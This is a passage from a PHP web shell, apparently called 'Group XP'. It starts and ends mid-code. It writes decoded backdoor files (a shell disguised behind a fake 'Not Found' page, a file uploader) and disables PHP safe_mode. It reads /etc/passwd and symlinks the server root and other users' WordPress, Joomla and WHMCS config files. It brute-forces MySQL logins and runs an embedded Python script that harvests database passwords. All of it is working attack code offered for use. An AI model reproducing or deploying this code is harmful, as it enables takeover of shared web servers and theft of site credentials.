QjUyQ0J4cGN0bmFBTFhWa3pTaGdCYVNGMmE3dEpPaXdlMElIZVNoY005WmNCeWpEdGltY2JPZ2NveTBDVUlMZmJrU2hVbmlGWkVMREI1TWRabDd0TWxNaG94dmMybFZodE9wZE1jdkJ6bmZSdE9wZE1jdkJ6eWZoVWw3dE1hakRvOEl3anhKd3VZMEdCeGxOVUZJQzI5U2QzdzZ3dEg0SGVJWEtlRUlLWm4wY2JpMFJiWVBDQk92ZnpQWEZ1SUlIdW40d2V5WEd0RWpLZUU0SGVJWHdlU21ObFNxYlVuYUYyYVpkTXlzY1VFTXd5bmlGM1kzZDNrTHdlUDhSMncrd3RFOENKbnpmdWxTY1QwbXdvWXZkbzlaS0pFakhlRVhIcmNvd2VTSWZvYTRmdDF6RG95TGQzRjZIdW40d2VuWEd0RXhGdUlJd3pFWEhlbm9PSkU3a3o1ZGtvbFZjTTlkSHkxZk50OUpOSkU4Q0puemZ1bFNjVDBtd29ZdmRvOVpLSkVqVzBIWEhlRVhLWm4wY2JpMFJiWVBDQk92ZnpQWEZ1SUlIdW40d2V5WEd0RWpXMEhYSGVFWEtaRitCWk9wZE1jdkJ6eWZiVFh2Q2o0OENtd0lSejRKS1hQTENVU3FLWHA5dG0waGNCWVBkWkVKTm93SUYzTzVkb0E5a1puamQyeHZGalBJd3pJWEtlRTRIdEU3d3VPbEd1V3NGMmlpY285M0tqblhHdEVYRnVJSUhibjR3dEg0SGVJWEtlRUlLWkYrTm9pWk5KT2l3cllYQ0I1bGR0bm9kM2FWY29hTFJqeEpGSkV2Tkp3N3RtMGhnV3BsQzJpdnd0RjhDbXdJUno0OENtd0lSejQ4Q213SVJ6NDhDbXdJUno0OGNvbDJ3b2xMTlVrTWQyOTBjYndKTm14OHdybExjQnJJS2pQSVRid1ZXQnh6Q1RZbERabjhndG5XRk05bUZNeXNkQmxWY1pFNktKbnVSQXdJZ3VYSU9vYXpEQmZWY2J3SUtqUElXQlhzQTNmcEYza2x3dXg4d2VYdmNvbDJOSVA4UjJPcGZqNDhSMmt2Y3VMK3RqWHZEdU9zZGU0bUtYcE1mQjVqZm9sdmRKbmxHdElMQ1VYTENKWExmb2E0ZnRsN3RKT2xHdW5TZDJPbHdlMEljYmlYZG85TGNVSUxDVVhMZm9hNGZ0TDd0Sk9sR3VuU2QyT2x3ZTBJY2JpWGRvOUxjVUlMQ0pYTGNiaVhkbzlMY2FTeGJVTDd0bWtsZnVhWmRKRUxjYmlYZG85TGNhU1hiVFNoZ1dwTWZCNWpmb2x2ZEpuU2QyZnBkSklMZmJZbEZKWExGb3l6RlpsN3RKT2p3ZTBJV28xNUYzeVNiMll2ZE01bEMzV1BrMnh2QzJ5U0RvOXpmdEZTa3VhemNid1NrdW5pRjNIcEtYcHBjSklMQ1psN3RNMTVGM3lTYjJZU2QzWWxodE9qaFRTaEZNYTBmYmtWd3VPWmZCQTd0bTFsZHVZbEdYcFpjYk8xRk00SWNNeVNGMkE3dG0waGdXcE1mQjVqZm9sdmRKbm1jYk9nY295MENVSUxmYmtTaGJTaGtveVp3ZTBJQ2JrWkNiTFBrenJWZnVpMGtaWG1ISjUwR3VXbVJ0RnpSbU80ZnRGU2t6V1ZmdWkwa1pYbVlVNTBHdVdtUnRGMlJtTzRmdEZTa3pGVmZ1aTBrWlhtS3Q1MEd1V21SdEY1Um1PNGZ0RlNrekVWZnVpMGtaTDd0Sk96Rk1ISU5Vbk1EQnhsYjJmbGZ5OWpkMjUwY0I1MEZaSUxmYmtTaFRTaGtvY3Bkb2F6d2UwSWNiaVhkbzlMY1VJbU5vcklEdWtsY2owSmtaWExGM2tqaFRTaGtvT2lmb3JJTlVuaUZta2lHVUlwS1hwTWQza2xDQllQaHRPTURCeGxGWm5pRlpFTERCVzlOSk9NREJ4bGhiU2hEQkNQa29sTHdlMDl3ZUVwR1hwamQyNTBEQjUxY1RTaGdXUExjTWxTY1VFOXdvYTRGb3h2Y29BUGtadytrWlhMY01sU2NVTDd0Sk9NREJ4bHdlMElmdWtwZFVJTGNNbFNjYVNYYlVMN3RNbE1odHlsRk1hbURVSW1SbU80ZnRGU2tvY3Bkb0FwaGJTaEMyOVZmb2xWZkJBN3RtMGhrdVlaQ1pFOXdvY3Bkb2FnYzJhMGIyWXZkbU9sZG1Pemh0d0xmYmtTUlpPTURCeGx3Skw3dE1sTWh0ckxGM2tqaGJTaEMyOVZmb2xWZkJBN3RtMGhrdWF6Y2J3SU5VbnpmdWtnRk1hWGRveWpjVUlMQ2J3U2taRlNrb2NwZG9BcEtYUExmYllsRkpFOXd1WTBGbDlaY2JuU0NCWWxodE9pRkpYbWtaWExmYllsRko0bVJtTzRmdEZwS1hQTGZiWWxGSkU5d3VZMEZsOVpjYm5TQ0JZbGh0T2lGSlhta1pYTGZiWWxGSjRtUm1PNGZ0RnBLWFBMZmJZbEZKRTl3dU9aREIwUEYzT1piM2tsRm94aUMyQVBrWjUwR3VXbVJ0Rm1SdE8xRjJhWmhVTDd0TWxNaG9hWmNCZnBodGtiZDNrTEF1a2xGM0hKUnRPekZNSHBoYlNoa3VuaUYzSElOVW5sR3RJSmNvYU1EQjVsaHRmcldsOVdXYVlUYTA5VU90RlN3dEZKUnR3bWhUU0pSdE96Rk1IcEtYUExjb3kwQ2FzZndlMElDYmtaQ2JMUGt1YXpjYndTa3VuaUYzSHBLWHA5Y0J4emNiU2hrdU92RDJhVkZaRTl3dU92RDJhVmIyZmxmeTlpZG9YUGt1WVpDWkw3dE1jdkZNYWlDMklQa3VPdkQyYVZGWm5pRlpFTGZvOXFjQjRwR1hwcGNKSWlrdU92RDJhVkJ6eWZoYlNoQzI5VmZvbFZmQkE3dG0waGt1T3ZEMmFWZE15c2NVRTl3dU92RDJhVmIyNWlkQkFQa3VPdkQyYVZCem5maFRTaERCQ1BrdU92RDJhVmRNeXNjVUVpTlVFbWF5OUJXYWtrV0FrSE9VRnBHWHBqZDI1MERCNTFjVFNoZ1dQTGZNeVp3ZTBJa3VPdkQyYVZCenlmS1hwcGNKaWxGTWFtRFVJbUZveXpGWkZTa3VjaUZKTHBHWFBMY0pFOXd1WTBGbDlaY2JuU0NCWWxodEZJa1pYbWtaeGxHdElMZk15WlJ0RjdrWlhMRjNramhVTDd0Sk9pd2UwSWZ1a3BkVWlsR3RJSk5VRkpSdHdtd0pYTGNKTHBLWFBMQ0pFOXd1T1pEQjBQY2JJUGtad21SdEZKa1pYTGNKTHBLWHBwY0pJTENVRWlOVUVta1psN3RKT1hDYll6d2UwSWtvcjd0bTFsZHVZbERCQ1Brb3dJd1QwSWtaRnBHWFBMRm95ekZaRTl3dE9KS1hwOXRNbE1odE9YQ2JZendlMDl3dEZtaGJTaEMyOVZmb2xWZkJBN3RtMGhrb09pZm95ZGJVRTl3b3laRk15NWh0TzFGMmFaUnRPWENiWXpoVFNoZ1dwOXRtMGhnV3BaY2JPMUZNNElrb09pZm9yN3RtMGhLWD09YWxWblJQSXE=';
$file = fopen("bhc.php" ,"w+");
$write = fwrite ($file ,base64_decode($confshell));
fclose($file);
    chmod("bhc.php", 0644);
$indexshell = fopen("index.php" ,"w+");
$data = 'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+';
$tulis = fwrite( $indexshell, base64_decode($data));
fclose($indexshell);
   echo "<iframe src=bconfig/bhc.php width=97% height=100% frameborder=0></iframe>";
break;

################CMS DETECTOR
case 'config';
$byphp = "safe_mode = Off
  disable_functions = None
  ";
file_put_contents("php.ini",$byphp);

echo '<CENTER><b>+--=[ Config priv8 ]=--+</b><br><br>';
?>

<bR><form method=post>
 <textarea rows=20 cols=85 name=user><?php  $users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}

?></textarea><br>
 <input type=submit name=su value="Lets Start" /></form></CENTER>
 <?php
 error_reporting(0);
 echo "<font color=#00ff size=2 face=\"comic sans ms\">";
 if(isset($_POST['su']))
 {
 mkdir('Inject',0777);
$rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$g = fopen('Inject/.htaccess','w');
fwrite($g,$rr);
$indishell = symlink("/","Inject/root");
      $rt="<a href=Inject/root><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";
        echo "Please check link given below for / folder symlink <br><u>$rt</u>";

  $dir=mkdir('INJECTION',0777);
  $r  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
        $f = fopen('INJECTION/.htaccess','w');

        fwrite($f,$r);
        $consym="<a href=INJECTION/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
        echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";

         $usr=explode("\n",$_POST['user']);
        $configuration=array("wp-config.php",
  "wordpress/wp-config.php",
  "web/wp-config.php",
  "wp/wp-config.php",
  "press/wp-config.php",
  "wordpress/beta/wp-config.php",
  "news/wp-config.php",
  "new/wp-config.php",
  "blogs/wp-config.php",
  "home/wp-config.php",
  "blog/wp-config.php",
  "protal/wp-config.php",
  "site/wp-config.php",
  "main/wp-config.php",
  "test/wp-config.php",
  "wp/beta/wp-config.php",
  "beta/wp-config.php",
  "joomla/configuration.php",
  "protal/configuration.php",
  "joo/configuration.php",
  "cms/configuration.php",
  "site/configuration.php",
  "main/configuration.php",
  "news/configuration.php",
  "new/configuration.php",
  "home/configuration.php",
  "configuration.php",
  "SSI.php",
  "forum/SSI.php",
  "forum/inc/config.php",
  "forum/includes/config.php",
  "upload/includes/config.php",
  "cc/includes/config.php",
  "vb/includes/config.php",
  "vb3/includes/config.php",
  "cpanel/configuration.php",
  "panel/configuration.php",
  "ubmitticket.php",
  "manage/configuration.php",
  "myshop/configuration.php",
  "beta/configuration.php",
  "includes/config.php",
  "lib/config.php",
  "conf_global.php",
  "inc/config.php",
  "incl/config.php",
  "include/db.php",
  "include/config.php",
  "includes/functions.php",
  "includes/dist-configure.php",
  "connect.php",
  "mk_conf.php",
  "config/koneksi.php",
  "system/sistem.php",
  "config.php",
  "Settings.php",
  "settings.php",
  "sites/default/settings.php",
  "smf/Settings.php",
  "forum/Settings.php",
  "forums/Settings.php",
  "host/configuration.php",
  "hosting/configuration.php",
  "hosts/configuration.php",
  "zencart/includes/dist-configure.php",
  "shop/includes/dist-configure.php",
  "whm/configuration.php",
  "whmc/configuration.php",
  "whmcs/configuration.php",
  "whmc/WHM/configuration.php",
  "whm/WHMCS/configuration.php",
  "whm/whmcs/configuration.php",
  "order/configuration.php",
  "support/configuration.php",
  "supports/configuration.php",
  "oscommerce/includes/configure.php",
  "oscommerces/includes/configure.php",
  "shopping/includes/configure.php",
  "sale/includes/configure.php",
  "config.inc.php",
  "amember/config.inc.php",
  "clients/configuration.php",
  "client/configuration.php",
  "clientes/configuration.php",
  "cliente/configuration.php",
  "clientsupport/configuration.php",
  "billing/configuration.php",
  "billings/configuration.php",
  "admin/conf.php",
  "admin/config.php");
  foreach($usr as $uss )
  {
   $us=trim($uss);

   foreach($configuration as $c)
   {
    $rs="/home/".$us."/public_html/".$c;
    $r="INJECTION/".$us." .. ".$c;
    symlink($rs,$r);

  }

   }


  }
break;
///////////////////////////////////
case'file';


break;
###################################

case 'brute';?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
/*
Recoded By Group XP
*/
@set_time_limit(0);
@error_reporting(0);


if($_POST['page']=='find')
{
if(isset($_POST['usernames']) && isset($_POST['passwords']))
{
    if($_POST['type'] == 'passwd'){
        $e = explode("\n",$_POST['usernames']);
        foreach($e as $value){
        $k = explode(":",$value);
        $username .= $k['0']." ";
        }
    }elseif($_POST['type'] == 'simple'){
        $username = str_replace("\n",' ',$_POST['usernames']);
    }
    $a1 = explode(" ",$username);
    $a2 = explode("\n",$_POST['passwords']);
    $id2 = count($a2);
    $ok = 0;
    foreach($a1 as $user )
    {
        if($user !== '')
        {
        $user=trim($user);
         for($i=0;$i<=$id2;$i++)
         {
            $pass = trim($a2[$i]);
            if(@mysql_connect('localhost',$user,$pass))
            {
                echo "Group XP ~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
                $ok++;
            }
         }
        }
    }
    echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by Group XP</b>";
    echo "<center><b><a href=".$_SERVER['PHP_SELF']."><< BACK</a>";
    exit;
}
}
if($_POST['pass']=='password'){
@error_reporting(0);
$i = getenv('REMOTE_ADDR');
$d = date('D, M jS, Y H:i',time());
$h = $_SERVER['HTTP_HOST'];
$dir=$_SERVER['PHP_SELF'];
$back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";
$file = fopen(".php","w+");
$write = fwrite ($file ,base64_decode($back));
fclose($file);
chmod(".php",0755);
mkdir('config',0755);
$cp =
'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=';
$file = fopen("cp.py","w+");
$write = fwrite ($file ,base64_decode($cp));
fclose($file);
chmod("cp.py",0755);
$url = $_POST['url'];
echo"<center>
<textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
system("python cp.py $url config");
unlink ('cp.py');
echo"</textarea>
</center>";
echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."> << BACK</a>";
exit;
}
if($_POST['matikan']=='sekatan'){
@error_reporting(0);
$phpini =
'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
$file = fopen("php.ini","w+");
$write = fwrite ($file ,base64_decode($phpini));
